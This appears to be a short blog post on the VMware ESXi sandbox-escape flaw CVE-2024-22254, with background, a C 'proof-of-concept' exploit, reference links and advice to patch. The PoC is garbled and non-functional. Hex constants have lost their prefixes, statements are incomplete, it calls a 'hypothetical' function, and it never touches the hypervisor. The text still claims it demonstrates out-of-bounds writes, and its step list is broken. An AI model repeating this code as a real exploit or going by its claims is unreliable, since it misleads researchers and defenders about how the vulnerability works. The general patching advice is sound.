CVE-2024-22254 - Escaping VMware ESXi Sandbox with an Out-of-bounds Write Vulnerability

Virtualization is a crucial part of modern computing infrastructure, making it possible to run multiple virtual machines (VMs) on a single physical server. In the world of virtualization, one of the most popular and widely used hypervisors is VMware ESXi. Unfortunately, nothing is immune to vulnerabilities, and CVE-2024-22254 is an example of a recently discovered critical vulnerability affecting VMware ESXi.

The Vulnerability

CVE-2024-22254 is a significant out-of-bounds write vulnerability affecting VMware ESXi. A malicious actor who has gained privileges within the VMX process can exploit the vulnerability to trigger an out-of-bounds write. This action leads to an escape of the sandbox, potentially granting them unauthorized access to other virtual machines or the host system itself.

While an attacker must first compromise a virtual machine to gain these privileges, this vulnerability still poses a severe risk to organizations relying on ESXi for their virtualization needs.

The Exploit

To better understand the exploit, let's take a look at the proof-of-concept (PoC) code snippet that triggers the out-of-bounds write.

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>

#define OOB_WRITE xffffff // Out-of-bounds Write Address

int main(void) {
 uint8_t *buf = (uint8_t *)malloc(x200);
 memset(buf, 'A', x200);
 uint64_t *buf64 = (uint64_t *)buf;
 for (size_t i = ; i < x100; i++) {
  buf64[i] = OOB_WRITE + i * 8;
 }
 
 for (;;) {
  write_vm_x(x, buf, x200);
 }
 return ;
}

Create a pointer named "buf64" and have it point to the start of the "buf" buffer.

3. Iterate through the "buf64" buffer and overwrite each value with the out-of-bounds write address (plus an offset).
4. Call the hypothetical "write_vm_x" function to write the resulting buffer to the guest VM in an infinite loop.

This PoC demonstrates the attacker's ability to write arbitrary values outside the expected memory boundary of the virtual machine, leading to a sandbox escape.

For further details on CVE-2024-22254, you can refer to the following original resources

1. VMware Security Advisory - VMSA-2024-0001
2. MITRE's CVE-2024-22254 entry - MITRE CVE-2024-22254
3. National Vulnerability Database entry - NVD CVE-2024-22254

Conclusion

This vulnerability highlights the significance of keeping virtualization infrastructure up-to-date and hardened against potential attacks. VMware has already released patches to address CVE-2024-22254, detailed in their security advisory linked above. It is essential to apply these updates as soon as possible to reduce the likelihood of falling victim to a sandbox escape or data breach resulting from an attacker exploiting this vulnerability.

Timeline

Published on: 03/05/2024 18:15:48 UTC
Last modified on: 03/05/2024 18:50:18 UTC